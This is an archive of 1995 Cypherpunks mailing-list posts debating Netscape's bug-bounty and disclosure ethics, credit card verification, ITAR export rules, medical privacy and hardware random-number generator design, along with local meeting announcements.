> > Have things really come to this?  Besides the legal implications of
> > discovering a hole and then selling the information to someone, (who
> > presumably will only want this information for one purpose) where has
> > the attitude of doing for the sake of doing gone?
>
> It's one thing to do good for the sake of doing good.  Most of us do that
> every day by participating in this list.  It's quite another thing to be
> insulted in the process.  I think that Netscape's reward is an insult,

Dr. Frederick B. Cohen has nailed it once again.  He's right. 

But Phil's comments really need to be addressed ... vis-a-vis the
implications of "discovering a hole and selling it".  Phil's hypothetical
is rightfully worrisome, but we should remember it _is_ only a
hypothetical. 

Let's not worry much about hypotheticals.  Perhaps we should worry more
about what in fact IS an ACTUAL, rather than what might possibly be. 

The hand-wringing should be over the existing reactions to publicly
ignored security holes and the ETHICS of the new Internet players.  

The ones who are so very cock-sure of themselves.  So cock-sure, that
they willingly gamble with public security and think that their invasion
of individuals personal boundaries and privacy is nothing noteworthy. 
That it will just somehow pass. 

My post detailing a structural flaw in Netscape Navigator was announced,
very quietly, to this list OVER ONE MONTH AGO.  And what has been done
about it, by AT&T and/or Netscape??  Nothing. 

AT&T has its reputation attached to this code, as does Deutsche Telecom,
as does Netscape.  The only "action" they've taken is to info-freeload and
then do absolutely, positively, definitely ... nothing. 

Diddly-squat.

No one has taken any action whatsoever.

How would we treat a company ... let's say a construction company that
found out that one of its buildings was unsafe, and then proceeded not to
barricade the complex.  If the company found out that the girders were not
up to the engineered spec, and simply allowed risk and harm to continue. 
If the Company thought it was OK to gamble with people's lives?  Would we
say that the reckless disregard for the public interest merited criminal
sanction?? 

Hopefully, we would.

To attack some hypothetical "information provider" for selling some
"hypothetical" information which a corporation denies is actually of any
value, at all -- nominal, or otherwise -- is an argument that just doesn't
float.  It completely misses the mark. 

> If they think you can find major security bugs in Netscape for as little
> as $1000, they should take the product off the market, or at least stop
> claiming that it offers security.

They should definitely take the product off the market.    

Period.  

They should also stop claiming that it offers any security.  In fact, they
should attach a product warning label, something that says that Netscape
Navigator degrades your inherent safety and security as soon as you use
it. 

That would be the "right thing" to do.  Because that is truthful.

AT&T's "brass" should have used the "Tylenol" or "Perrier" crisis
management model on this one.  Rather than, "The stick your head in the
sand like an ostrich" model.  Or the "Gee, maybe if I close my eyes, and 
pull the covers over my head, the boogie-man will go away" school. 

Someone has to call them on their collective jump into the World of
Management by Denial.

The issue here isn't the so-called "reward", the focus should rightly be
placed on who knew what and when they knew it, and what they did as a
consequence.  The issue is whether these Goliath Companies, happily roll
the dice when public safety and security is on the line. 

It's that simple.  A real no brainer.

> >  Has Netscape been pestering
> > security experts on the net for free work?  Have they been plaguing
> > people or lists with email asking the net to do their jobs?
>
> They do far worse.  They claim security when they don't have it, and
> when the cypherpunks demonstrate the false claims, Netscape offer
> insulting future tribute.  I think that if they are sincere, they should
> reward the individuals who found the last few holes with $25,000 each,
> and show that they really mean business.

Actually, they said that they want to "harness" the power of the internet,
and in return offered a chance to be enrolled in a contest for a mug or a
T-shirt, or maybe ... if they ... in "their sole discretion" thought
something was a security bug, then they'd offer a $1,000 award. 

Not *pestering* security experts, but simply asking them to sorta, kinda
take a look at the product.  Look, and help build the Companies' fortunes,
while the "Creative" talent might get a nice Netscape mug for their
troubles. 

This is what Netscape DID, but this isn't the true issue.

The true issue is a question of attitudes, not of monetary compensation. I
really don't care if Netscape or AT&T offer gold stars and nice little
pats on the head, or offer many "millions" or offer $25,000, or expect the
world's foremost security auditors to work for T-shirts or a bitta
Crackerjack. 

That's not the issue.

I just don't believe that any company should on the one hand represent
that they have a secure product -- that they actually care about security
 -- while on the other hand they take their black-box code and say that
anyone who brings an error to their attention -- a critical security flaw
 -- agrees implicitly to make the report the Company's property -- property
to be used at the Company's sole discretion. 

A security review audit is first and foremost for the benefit of the end
users.  The audit is not so that the company can use the information for
its own purposes.  The information is not there so that the company can
use a confidential auditor's report on security flaws to spy on their own
customers, and its certainly not there to enable a code cover-up.

Hell, these firms try to cover up even when the information is PUBLIC, let
alone when it's given to them in private.  And the crying and whining is 
unbecoming, because the attempt at private communication was made.

It was made with both Netscape, and with AT&T.

> > The ironic part is the people who have been the most successful at
> > finding bugs are not the ones who are demanding money for it!
>

You're right.  the people who find the bugs simply ask that the public
interest be served ... that the Network's interest be served, and that the
National interest be served. 

Defective product serves no one, and adding an object to an existing
computing environment under the rubric of an experimental data type serves
no-one.  Correction, it serves no-one except those who would rather see
harm come to the public. Those who value and place their own self-interest
above that of others. 

And the consequnces be damned.

> The ironic part is that a company that claims to have a "secure" method
> for using credit cards on the Internet thinks that their security is so
> weak that it only takes $1000 to find a major hole.

The ironic part is that even once a critical design flaw is identified, no
action is taken by anyone -- even when the person who finds it demands no
money whatsoever for it -- the real irony is that the press is silent, and
so is the company. 

See no evil, speak no evil, hear no evil.

Let the harm and damage continue ... by my calculation, it's been one
month already ... shall we maybe try now for two?? 

I don't think so. 

> --
> -> See: Info-Sec Heaven at URL http://all.net
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From EALLENSMITH at mbcl.rutgers.edu  Wed Nov 15 18:53:47 1995
From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH)
Date: Wed, 15 Nov 95 18:53:47 PST
Subject: credit card conventional wisdom (fwd)
Message-ID: <01HXOR9P3BB48WY0P1@mbcl.rutgers.edu>


From: Simon Spero <ses at tipper.oit.unc.edu>

The printed digits above the embossed account number are the first four
digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
to discourage re-embossing of the card with another account number.
----------------------
	You may be interested in knowing that this appears to vary depending
on the card issuer (or possibly on when the card was issued). My MasterCard
(from USAA) has no such printed digits; instead, the entire account number
is on the back of the card, plus 3 (I would guess check) digits.
	-Allen





From joelm at eskimo.com  Wed Nov 15 20:29:00 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Wed, 15 Nov 95 20:29:00 PST
Subject: e$: Come aaaannnndddd Get it!
In-Reply-To: <v02120d05acd0346e6c23@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.951115201837.2421C-100000@eskimo.com>


Although Private Idaho will always remain free, to encourage Ecash use, 
my Web page will support "donations."  The initial merchant list sounds 
like it's going to be a subset of this list.  Time to go add the Mark 
Twain links to the page.  This is going to be fun...

Joel McNamara
joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?





From jsw at netscape.com  Wed Nov 15 20:29:08 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 15 Nov 95 20:29:08 PST
Subject: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <30AABCD6.5E6A@netscape.com>


Perry E. Metzger wrote:
> 
> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release.  Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting.  Netscape has been shipping the fixed
> > applet security model for over a month(since 2.0Beta1), and
> > Netscape and Sun continue to cooperate and work closely on applet
> > security issues.
> 
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like. I know, Jeff, that
> its all done by different groups -- but the Java stuff I've run in
> 2.0beta2 is so weirdly different than the supposedly compatible stuff
> I've run under HotJava -- especially when it comes to crashing (and it
> HAS crashed on me) that I have serious worries about the security of
> the thing. I'd say the quality looks very much like an alpha release,
> not "beta". I don't want to turn this to Javapunks so I won't say more
> on this topic any time soon -- its already been beaten into the
> ground.

  The version of Java in Netscape is not compatible with the version of
Java in the summer release of HotJava.  There were incompatible changes
made by Sun between their alpha(summer HotJava) and beta (Netscape 2.0
and Sun's JDK Beta).  As I understand the situation, applets that were
written for HotJava must be ported to the beta API for them to work
with more recent releases of Java.

  I would agree that Java is not as stable as the rest of the 2.0 release.
That is one reason why we have added a preference to disable Java.
If you are worried about it you can just switch it off.  I argued for
this switch because I knew that there would be people who would not
want to trust Java until it had some mileage on it.

  The early beta releases we do are mostly intended for developers and
early adopters who want early access to the new features.  We had a
great leap in quality between B1 and B2, and I expect that to continue
with the future betas.  

	--Jeff  

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Wed Nov 15 05:04:43 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Wed, 15 Nov 1995 21:04:43 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511151255.AA26027@toad.com>


:    It kind of sickens us that we had to do it, but so be it. 
:    
:    Patches that re-implement the PEM code may be available at a foreign
:    site soon. If it does show up, we'll point to it - that can't be
:    illegal! 

I see no reason why they should not be as ``illegal'' as the
crypto-with-a-hole sillyness.  Pointing to software is a pretty
effective way of disclosing it, and disclosing cryptographic
software--apparently including holes--to foreign persons without a
license is a violation of the ITAR.

Of course, the ITAR itself is illegal as it applies to cryptographic
software, but I agree that one does not want to be the defendant in a
criminal case based on those unconstitutional provisions.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From jya at pipeline.com  Wed Nov 15 06:26:10 1995
From: jya at pipeline.com (John Young)
Date: Wed, 15 Nov 1995 22:26:10 +0800
Subject: MED_vac
Message-ID: <199511151416.JAA13881@pipe2.nyc.pipeline.com>


   11-15-95. NYPaper Page One:


   "When Patients' Records Are Commodities for Sale."

      Individual medical records, carrying more sensitive
      personal information than ever before, are increasingly
      being gathered and stored by the tens of thousands in
      commercial databanks maintained by institutions like
      hospital networks, health maintenance organizations and
      drug companies. And although there is a Federal law that
      protects the privacy of video rental lists, private
      medical information is being bought and sold freely.

      The issue of medical privacy touches virtually everyone.
      "It is true to say that if you know a person's history
      of health problems, then you know more about that person
      than you would with any other data," said Lawrence O.
      Gostin, a professor at Georgetown University Law Center.
      And as medical records start including new genetic
      information that can predict diseases likely to show up
      in years to come, they will be able to reveal "not just
      health histories, but health futures," Mr. Gostin said.

      Yesterday hearings were held on a bill called the
      Medical Records Confidentiality Act, intended to
      establish uniform Federal rules for the use and
      disclosure of health information.

      Although the bill details procedures for obtaining
      consent, it also establishes a formidable list of
      exceptions to this requirement. The police, health
      oversight agencies, health information services, public
      health offices and medical researchers are among those
      allowed to obtain records of an identified patient
      without that person's consent and, in many cases without
      notification.


   MED_vac  (15 kb)













From melman at osf.org  Wed Nov 15 07:01:56 1995
From: melman at osf.org (Howard Melman)
Date: Wed, 15 Nov 1995 23:01:56 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com>
Message-ID: <9511151447.AA10433@absolut.osf.org.osf.org>




On Tue Nov 14, 1995, Vladimir Z. Nuri wrote:

> attempts to get secure credit card number transfer on the
> internet are not an end in themselves. they are the first
> steps toward an entirely new transaction system. those who
> see a single step and criticize it as feeble in the
> context of past systems are missing the point and
> apparently can't think past the present nanosecond of
> their lives.

You'll have a hard convincing folks that they need something
better than what works perfectly well today.

Here's another point that I didn't see in your list.  Today
it might be just as safe to send your CC# over the internet
as giving it to a clerk, etc.  This is mostly because the
number of CC#'s sent over the net vs the whole traffic is
small.  It is therefore not very cost effective to try to
steal credit card numbers over the net vs other means
(searching through dumpsters, taping a phone line near LL
Bean, etc.).  If CC# purchases became common over the net,
it would become much more valuable to try to steal them from
the net and more people would.  It would then become much
less secure, not for any technical reason but because there
will be more crooks exploiting the existing flaws.

Where is it most common to steal cellular phone id's (I'm
not sure what they are called, but the id's sent that
someone can steal to build a forged cell phone)?  At
airports.  Why?  Because more cell phones are used there,
everyone uses one as they get on or off a plane.  If you
want to troll for id's, go to where there are many.

Howard





From rjc at clark.net  Wed Nov 15 07:26:44 1995
From: rjc at clark.net (Ray Cromwell)
Date: Wed, 15 Nov 1995 23:26:44 +0800
Subject: Netscape rewards are an insult
In-Reply-To: <9511151215.AA20714@all.net>
Message-ID: <199511151510.KAA23996@clark.net>



> 
> On a closely related vein, Sun has announced that they are severely
> limiting some functions in HotJava - from Risks-17-45:

   The problems found however, were not fundamental flaws in
the Java language itself nor in the Java virtual machine. As
I've said many times, you can pretty much rip any i/o capability
out of Java by changing the runtime class libraries. If someone
finds as way to to defeat the Java bytecode verifier/class loader
and replace a class in java.* with a more powerful one, then that
will be really significant.

> I had a rather lengthy discussion with a gentleman from Sun at the CSI
> conference last Tuesday night, and this announcement follows many of the
> things we discussed very closely.  This kind of consistency between what
> people say and what the company published is refreshing, and it restores
> my faith in Sun's desire to do things well.  Of course there are still
> some problems left unresolved:

[denial of service problems deleted. ]
> 
> Similarly, if your HotJava allows an insecure Postscript implementation
> to interpret postscript files, you're still beat.

   This is not a flaw or a feature. If you download a helper
app off the internet that has a flaw, it's not a flaw in the 
browser. Claiming that it is is like claiming that
"ftp"  or "nfs" has a fatal flaw because it allows you execute
untrusted binaries from other computers. Helper apps are in
the category of third party add-ons and the responsibility for
their correct implementation rests on the companies which sell them.
Netscape never claimed the ability to allow users to download
executable binary applications from the net and run them without
risk. Netscape doesn't come with a postscript interpreter nor does
it have one configured by default, so if the user installs one
and configures it, and it has a security flaw, it's not Netscape's
fault. Installing helper apps is not "easy" compared with
clicking on a Java applet so any user who does it must atleast be 
somewhat knowledgable.

   If a postscript interpreter is implemented in JDK Beta, and
it is insecure and it is allowed to interpret postscript files,
nothing bad will happen.

> I do think that this response by Sun, regardless of the technical merits
> of the particulars, demonstrates a desire to improve protection and a
> willingness to listen.  My compliments for that.

   They've never demonstrated otherwise in my entire history on the Java
mailing lists. Their whole mission is to produce a secure environment
for executing untrusted applications. The alpha's and beta's  of
every product have problems, it's to be expected. The whole point
of releasing a beta is so that you can get feedback.

-Ray





From merriman at arn.net  Wed Nov 15 07:54:17 1995
From: merriman at arn.net (David K. Merriman)
Date: Wed, 15 Nov 1995 23:54:17 +0800
Subject: RSA T-shirt
Message-ID: <199511151531.JAA12350@arnet.arn.net>


FWIW, I finally got a chance to see if my barcoded RSA-in-perl t-shirt would
actually scan - and it did! It took a bit of fiddling, but it was scannable
using one of those hand-held CCD barcode readers.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148







From rsalz at osf.org  Wed Nov 15 08:24:16 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 16 Nov 1995 00:24:16 +0800
Subject: credit card conventional wisdom
Message-ID: <9511150243.AA14648@sulphur.osf.org>


>There is in fact a distinction between "card present" and "card not present"
>transactions. AMEX cards for example have an extra group of four digits which 
>are not part of the embossed card number. They are used as additional 
>verification to prove that a card is present.

So the run-it-through-the-mechanical-device is treated as card not present?
	/r$





From hallam at w3.org  Wed Nov 15 08:24:34 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 16 Nov 1995 00:24:34 +0800
Subject: credit card conventional wisdom
In-Reply-To: <9511150243.AA14648@sulphur.osf.org>
Message-ID: <9511150255.AA01940@zorch.w3.org>



For AMEX, it apears not! Or at least there is a requirement for the 
assistant to enter the extra four digits in certain cases. The precise
nature of the circumstance when they are required to be card present I
am not sure (in fact I would bet they vary).

There is no reason why the magnetic strip should necessarily be considered
to be card present. It is easy enough to forge, readers need not be
attended (eg petrol pumps).

I'm not sure on the exact rules, I don't pay $80 for the privillege of having
plastic!

Thew main point I was responding to was the "add information to card that
is not on the stripe" point of the original poster.



	Phill





From aleph1 at dfw.net  Wed Nov 15 09:53:41 1995
From: aleph1 at dfw.net (Aleph One)
Date: Thu, 16 Nov 1995 01:53:41 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511150512.VAA08514@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.90.951115111136.26369B-100000@dfw.net>


Obiously you never jumped in the garbage bin of a restorant looking for cc's.
Yeah give it to one person... sure.....

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 14 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> Actually, this is not quite correct.  There is a difference if I give a
> credit card to *one* person, or if I give the message containing that
> number to a chain of twenty or thirty strangers to get my information to
> the one person I want to have that information. 
> 





From rah at shipwright.com  Wed Nov 15 10:15:22 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 02:15:22 +0800
Subject: DCSB: "A Middleware Guy Looks at Issues in Digital Commerce"
Message-ID: <v02120d08accfd5a980c7@[199.0.65.105]>


-----BEGIN PGP SIGNED MESSAGE-----

                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                               Rich Salz
                        Open Software Foundation

           "A Middleware Guy Looks at Issues in Digital Commerce"


                        Tuesday, December 5, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Rich has been with OSF for nearly four years, where he has been
the technical lead of the OSF DCE 1.1 and 1.2 releases.  He is
also helping write the secure multi-threaded WWW server for the
DCE-Web project.  He has been active in Usenet, and is the author
of INN, one of the most popular Usenet/NNTP implementations.
His home page is http://www.osf.org/~rsalz.

Rich says:

>In the rush to separate lift even more money out of your wallet
>-- sorry, to provide consumers with more choice and opportunity
>-- the electronic commerce community has largely been ignoring
>issues that the distributed systems field has been trying to
>address for years.


This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, December 5, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
December 2 (that's two weeks from this Saturday), or you won't be on the list
for lunch. Checks payable to anyone else but The Harvard Club of Boston will
have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with a few glacial A/P departments ourselves, for instance), please
let us know via e-mail, and we'll see if we can work something out.


January's speaker will be Art Hutchinson of Northeast Consulting Resources,
Inc.

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the BSDC Program Commmittee, care of Robert
Hettinga, rah at shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info bsdc" in the body of a message to majordomo at ai.mit.edu .  If you want
to subscribe to the BSDC e-mail list, send "subscribe bsdc" in the body of a
message to majordomo at ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Bob Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKooW/gyLN8bw6ZVAQFMAQP+MQn6wlKxMVHekN1mruUrwILBR0KTcxSK
RQo7ELRJAP0aEiEskio3bphrgCpWgxKHJn9KP3YEHuNbwwXZGVzVTlijvzmbVksf
ybtAsspMERb/9yWOe4AT69R/hSTAjEkzCwx86iP4FbjBccPiQPQD1eKJ+4C4obW+
WFuq7mpizeU=
=J6UH
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From liberty at gate.net  Wed Nov 15 10:51:47 1995
From: liberty at gate.net (Jim Ray)
Date: Thu, 16 Nov 1995 02:51:47 +0800
Subject: So. FL Cypherpunks Keysigning/Party
Message-ID: <199511151832.NAA33898@tequesta.gate.net>


-----BEGIN PGP SIGNED MESSAGE-----

Greetings South Florida cypherpunks--

        All cypherpunks in or near Dade county who wish to meet will be
getting together at 7:30PM on Wednesday, November 29th. In keeping with
past South Florida cypherpunks tradition, we are going to meet where the
_beer_ is, and (better yet!) this South Florida cypherpunks meeting will
coincide with the monthly meeting of the Miami Area Society of Homebrewers
("M.A.S.H.") at the Abbey Brewing Company on Miami Beach. This bar serves
a selection of barsnacks, not quite as extensive as the food at The
Riverwalk Brewery, but at least they aren't going out of business...

Location:
The Abbey Brewing Company  (305) 538-8110
1115 16th Street, Miami Beach

Directions:
[From North: Take I-95 South to 195 exit, over to the beach, and go South
on Alton Road. Look for a green sign that says "BAR" atop the building.]
[From South: Take I-95 North to 395 exit, over to the beach, and go North
on Alton Road. Look for a green sign that says "BAR" atop the building.]

        I will be bringing the videotape of the "Mitchells In The Morning"
talkshow featuring PRZ that I mentioned a while ago, but The Abbey has no
VCR, and the atmosphere might not be right for a showing.
        Because the meeting is on Miami Beach, folks from far away are
urged to carpool or use Tri-rail to Metrorail and then get a ride from
Jim Ray (I will try to stay *somewhat* sober). e-mail <liberty at gate.net>
for ride or carpool details & I'll try to coordinate the transportation
aspect of the meeting for those in need of a ride.
        Joe Block <jpb at miamisci.org> is willing to coordinate the
keysigning aspect of the meeting, and he will post in a few days.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMKoxZm1lp8bpvW01AQHLywP/YUWrjYBGyhTXVNyJa05WrUZPtZcNx2sK
e6Q0Zc4CYm2q3y5Xq2jdOz8pql95y2L/anSNAJS3zdAR4SFpGR45ZxNtLXy1YU6r
6KDCwPpjoJ4+aUdXrfcW/2DR3BMatHIy25I26SqWmwiVSFRvjIBEH9PO73QA9c7Z
Yo5nKaDvRu0=
=oRZQ
-----END PGP SIGNATURE-----
Regards, Jim Ray

"...the politicians have been arguing over whether to increase the
   budget enormously or just hugely. The news media refer to this
   process as 'cutting' the budget." -- Dave Barry

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty at gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________





From jimbell at pacifier.com  Wed Nov 15 11:12:24 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 03:12:24 +0800
Subject: Hardware-random-bits interface
Message-ID: <m0tFmLF-000912C@pacifier.com>


>I've been thinking about physically random bits recently, so
>I'd like to offer a simple, easily implementable interface to a
>source of such bits, along with a design sketch using a common
>radio receiver chip as the noise source.  The interface consists
>of two bits in the standard PC parallel port, one serving as
>the data line and the other the sampling clock.
[stuff deleted]

>  Device probing:  the device should somehow identify itself
>    as a random bit generator.  One way to do this is to wire
>    one of the parallel port data bits to a status line; for
>    example, data bit 0 (pin 2) could be wired to status bit 5
>    (pin 12).  Software can then twiddle the data bit and
>    watch for the response.

I'm not a crypto expert, or a mathematician, or anything like that, but I
think I have a few suggestions that you should consider.

1.  DON'T let the random-number generator "know" that it is being accessed,
even with something as simple as a clock.  The reason is that if it became
important enough, an agency with a BIG BUDGET could make a custom chip that
implemented the same apparently-random function, (but might really be a
10**18 state machine with, say, only 10**6 starting positions) but could be
"alerted" and reset by a specific pattern of external accesses, possibly
activated by a special-purpose virus.

The resulting "fake" chip would appear to result in random output, if never
reset, but would produce a data stream with a predictable series with a
limited number of starting points.

2.  Since the main goal of the project is to have this end up being an
ECONOMICAL board, you'll probably end up with a data stream which has some
sort of slight bias in one direction or another.  As far as I can see,
that's okay, because it merely means that you're getting somewhat less than
one bit of randomness with each accessed bit.  But as I understand it, the
solution to this is to combine the bits in software so that you end up with
fewer bits.  While it's been months since I've read Schneier's book, I
recall that it talked about extracting more-perfectly-randomized bits from a
larger collection of not-quite-so-randomized ones.

3.  In addition, for most trustworthy results, I think you should XOR the
resulting data with a long-period pseudorandom stream of bits derived and
modified from some reasonably random inputs, such as keystroke timings and
free-running-system-clock bits.  The reason is that (as far as this neophyte
knows)  a stream of GOOD randomized numbers XOR'ed with a stream of
reasonably randomized numbers results in a stream at least as randomized as
the better source.  More importantly, such a procedure should help deter any
attempt to corrupt the physically-random source, because even going to that
trouble of subverting it they'd only defeat only one stage in the process.

4.  I think the user should be given the option of socketing the IC's.
True, that would make it easier for an interloper to replace, but it would
also allow the user to quickly swap the critical chips, possibly at
intervals of a few days to a few weeks, to partially guard against sabotage.

5.  The whole assemblage should be able to be stored in a package sealed
with evidence tape.






From tcmay at got.net  Wed Nov 15 11:15:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 16 Nov 1995 03:15:15 +0800
Subject: Hardware-random-bits interface
Message-ID: <accf76ef010210049425@[205.199.118.202]>


At 3:17 PM 11/15/95, David K. Merriman wrote:
>At 02:31 PM 11/14/95 -0800, you wrote:
>>I've been thinking about physically random bits recently, so
>>I'd like to offer a simple, easily implementable interface to a
>>source of such bits, along with a design sketch using a common
>>radio receiver chip as the noise source.
>
>It sounds like a fairly decent idea, _as long as you shield the bejeebers
>(technical term :-) out of it_. Otherwise, anybody with a signal generator
>could skew your numbers however they saw fit: any component lead can act as
>an antenna, no matter now small that lead is.

But if you "shield the bejeebers out of it," then all the radio receiver
generates is whatever signal manages to sneak through--which, ironically,
would make it _easier_ for an outside attacker to drive--and some amount of
internal receiver/amplifier noise, such as the Johnson noise talked about
here. (Every receiver has an "equivalent noise temperature," recall.)

And if one is left with only internal noise, why not simply use a nice
clean source like a Zener diode?


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From merriman at arn.net  Wed Nov 15 11:22:50 1995
From: merriman at arn.net (David K. Merriman)
Date: Thu, 16 Nov 1995 03:22:50 +0800
Subject: Hardware-random-bits interface
Message-ID: <199511151519.JAA12151@arnet.arn.net>


At 02:31 PM 11/14/95 -0800, you wrote:
>I've been thinking about physically random bits recently, so
>I'd like to offer a simple, easily implementable interface to a
>source of such bits, along with a design sketch using a common
>radio receiver chip as the noise source.

It sounds like a fairly decent idea, _as long as you shield the bejeebers
(technical term :-) out of it_. Otherwise, anybody with a signal generator
could skew your numbers however they saw fit: any component lead can act as
an antenna, no matter now small that lead is.

One way to handle it would be to lay it out as a multi-layer PCB, with the
signal & power traces inside, and ground plane on the outer layers. Then
enclose the circuit components inside a shielding enclosure (mu-metal would
be good) mounted to the PCB, then tuck the entire assembly inside another
enclosure (small aluminum box for example, also connected to ground).

Of course, there would be easier ways to fabricate it, but they would just
make the shielding that much more difficult to implement.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148







From perry at piermont.com  Wed Nov 15 11:29:28 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 16 Nov 1995 03:29:28 +0800
Subject: Hardware-random-bits interface
In-Reply-To: <accf76ef010210049425@[205.199.118.202]>
Message-ID: <199511151905.OAA08439@jekyll.piermont.com>



Timothy C. May writes:
> But if you "shield the bejeebers out of it," then all the radio receiver
> generates is whatever signal manages to sneak through--which, ironically,
> would make it _easier_ for an outside attacker to drive--and some amount of
> internal receiver/amplifier noise, such as the Johnson noise talked about
> here. (Every receiver has an "equivalent noise temperature," recall.)
> 
> And if one is left with only internal noise, why not simply use a nice
> clean source like a Zener diode?

Quite solidly agreed. Internal noise beats external noise, and there
is no point in using a radio receiver when what you want is internal
noise.

.pm





From sjb at universe.digex.net  Wed Nov 15 11:32:09 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Thu, 16 Nov 1995 03:32:09 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <m0tFUJh-00091rC@pacifier.com>
Message-ID: <199511151908.OAA05536@universe.digex.net>


jim bell writes:
>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>(1), (2), (3), (4) and (5) of this category;"
>
>Question:  What makes computers in general NOT describable by such a
>paragraph?!?

